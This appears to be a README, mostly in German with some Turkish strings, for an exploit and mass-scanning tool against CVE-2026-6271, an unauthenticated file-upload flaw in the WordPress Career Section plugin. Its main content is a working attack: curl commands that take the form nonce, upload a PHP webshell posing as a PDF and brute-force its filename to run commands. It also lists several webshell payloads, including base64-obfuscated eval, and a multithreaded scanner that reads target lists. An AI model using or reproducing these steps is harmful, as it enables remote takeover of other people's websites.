
Automatisierter Scanner für CVE-2026-6271, eine kritische nicht authentifizierte beliebige Datei-Upload-Schwachstelle, die zu RCE im WordPress Career Section Plugin führt. Unterstützt Multithread-Scanning, mehrere Shell-Typen und Proxy-Integration.
Plugin: Career Section (
career-section) CVE-ID: CVE-2026-6271 CVSS-Score: 9.8 (Kritisch) CVSS-Vektor:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HSchwachstellenart: Nicht authentifizierter beliebiger Datei-Upload → Remote Code Execution Betroffene Version: <= 1.7 Gepatchte Version: 1.8 Veröffentlichungsdatum: 13. Mai 2026 Forscher: Paolo Tresso — Wordfence
Das Career Section Plugin ermöglicht es Website-Besitzern, Stellenausschreibungen zu veröffentlichen und Bewerbungen zu sammeln. Auf jeder Stellenausschreibungsseite befindet sich ein „Apply Now“-Formular. Dieses Formular enthält ein Feld zum Hochladen einer CV-Datei.
In Version 1.7 und früheren Versionen akzeptiert der Upload-Handler jeden Dateityp — einschließlich .php. Da das Formular öffentlich ist und das CSRF-Token im Seiten-HTML eingebettet ist, kann diese Schwachstelle ohne jegliches Konto oder Berechtigungen ausgenutzt werden.
WordPress-Nonces sind CSRF-Tokens, keine Authentifizierungs-Tokens. Der Nonce-Wert wird für jeden Besucher in das Seiten-HTML eingebettet:
<script id='prosolwpclient-public-js-extra'>
<!-- templates/single-csection.php — line 316 -->
<?php wp_nonce_field( 'csaf_form_submission', 'csaf_form_nonce' ); ?>
Nicht authentifizierte Besucher können einen gültigen Nonce erhalten und die Validierungsprüfung bestehen.
// templates/single-csection.php — lines 170–182 (version 1.7)
if ( ! empty( $_FILES['cv']['name'] ) && ! empty( $_FILES['cv']['tmp_name'] ) ) {
$original_name = sanitize_file_name( $_FILES['cv']['name'] );
$name_file = time() . '_' . $original_name;
$destination = $cs_dir . '/' . $name_file;
// Uzantı kontrolü YOK — .php dahil her şey kabul edilir
if ( $wp_filesystem->move( $_FILES['cv']['tmp_name'], $destination, true ) ) {
$uploaded_file_url = $upload_dir['baseurl']
. '/cs_applicant_submission_files/'
. $name_file;
}
}
sanitize_file_name() entfernt lediglich Sonderzeichen, unterbindet jedoch keine gefährlichen Erweiterungen.
wp-content/uploads/cs_applicant_submission_files/<timestamp>_<filename>
In diesem Verzeichnis gibt es keine .htaccess-Datei, die die Ausführung von PHP verhindert.
| Grund | Beschreibung |
|---|---|
| Keine Authentifizierung erforderlich | Nonce ist im öffentlichen HTML eingebettet |
| Keine Dateityp-Beschränkung | .php, .php5, .phtml werden akzeptiert |
Kein .htaccess-Schutz | PHP wird im Upload-Verzeichnis ausgeführt |
| Vorhersehbarer Dateiname | time()_filename → Timestamp-Brute-Force |
⚠️ Haftungsausschluss: Dieses PoC dient nur zu Bildungszwecken. Testen Sie nur Systeme, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung haben.
Voraussetzungen:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
TARGET="http://target.com"
JOB_URL="$TARGET/careers/software-engineer/"
NONCE=$(curl -s "$JOB_URL" \
| grep -oP 'name="csaf_form_nonce" value="\K[^"]+')
echo "Nonce: $NONCE"
Struktur, die im Seitenquelltext gesucht wird:
<input type="hidden"
id="csaf_form_nonce"
name="csaf_form_nonce"
value="a1b2c3d4e5" />
TS=$(date +%s)
curl -s -X POST "$JOB_URL" \
-F "first_name=John" \
-F "last_name=Doe" \
-F "present_address=123 Main St" \
-F "[email protected]" \
-F "mobile_no=1234567890" \
-F "post_name=Engineer" \
-F "submit=Submit" \
-F "csaf_form_nonce=$NONCE" \
-F "[email protected];type=application/pdf" \
| grep -o "Application has been sent"
Der Dateiname hat das Format <timestamp>_shell.php. Probiere Timestamps rund um $TS aus:
UPLOADS="$TARGET/wp-content/uploads/cs_applicant_submission_files"
for T in $(seq $((TS-2)) $((TS+2))); do
URL="$UPLOADS/${T}_shell.php"
RESULT=$(curl -s "$URL?cmd=id")
if echo "$RESULT" | grep -q "uid="; then
echo "Webshell aktiv: $URL"
echo "RCE çıktısı : $RESULT"
break
fi
done
Erwartete Ausgabe:
Webshell aktiv: http://target.com/wp-content/uploads/cs_applicant_submission_files/1747302451_shell.php
RCE çıktısı : uid=33(www-data) gid=33(www-data) groups=33(www-data)
git clone https://github.com/kullanici/cve-2026-6271-scanner
cd cve-2026-6271-scanner
pip install -r requirements.txt
requirements.txt
requests
python career_section_rce.py -u http://hedef.com
python career_section_rce.py -u http://hedef.com \
--job-url http://hedef.com/careers/engineer/
python career_section_rce.py -u http://hedef.com \
--verify-cmd "whoami"
python career_section_rce.py -l targets.txt -t 20 -o sonuclar.txt
python career_section_rce.py -u http://hedef.com --ts-window 10
python career_section_rce.py -u http://hedef.com \
--shell-type full \
--proxy http://127.0.0.1:8080
| Parameter | Kurz | Beschreibung | Standard |
|---|---|---|---|
--url | -u | Einzelziel-URL | — |
--list | -l | Datei mit Zielliste | — |
--threads | -t | Anzahl der Threads | 10 |
--output | -o | Ausgabedatei | rce_confirmed.txt |
--job-url | — | Direkte Joblisten-URL | — |
--shell-name | — | Name der hochzuladenden Datei | shell.php |
--shell-type | — | Shell-Typ | system |
--verify-cmd | — | Befehl zur RCE-Überprüfung | id |
--ts-window | — | Timestamp-Brute-Force-Fenster (±s) | 5 |
--proxy | — | Proxy-URL | — |
--timeout | — | Anfrage-Timeout (s) | 10 |
| Typ | Payload | Beschreibung |
|---|---|---|
system | <?php system($_GET["cmd"]); ?> | Grundlegender Systembefehl |
passthru | <?php passthru($_GET["cmd"]); ?> | Rohe Ausgabe |
exec | <?php echo exec($_GET["cmd"]); ?> | Stille Ausführung |
assert | <?php assert($_POST["cmd"]); ?> | eval per POST |
b64 | <?php eval(base64_decode($_POST["cmd"])); ?> | Base64-Obfuskation |
full | shell_exec + system + exec fallback | Vollwertige Shell |
WordPress Kök/
└── wp-content/
└── uploads/
└── cs_applicant_submission_files/
└── <timestamp>_shell.php ← Shell burada
Direkter Zugriff:
curl "http://hedef.com/wp-content/uploads/cs_applicant_submission_files/1747302451_shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
| Status | Beschreibung |
|---|---|
★ RCE OK | Shell hochgeladen + Befehl erfolgreich ausgeführt |
★ SHELL ALIVE | Shell erreichbar, andere Antwort zurückgegeben |
~ EXEC_DISABLED | Shell vorhanden, aber exec() auf dem Server deaktiviert |
? UPLOADED | Hochgeladen, aber Timestamp nicht gefunden |
- BLOCKED | Dateityp blockiert (gepatchte Version) |
~ NO_NONCE | csaf_form_nonce nicht gefunden |
~ TIMEOUT | Verbindungszeitüberschreitung |
~ UNREACH | Ziel nicht erreichbar |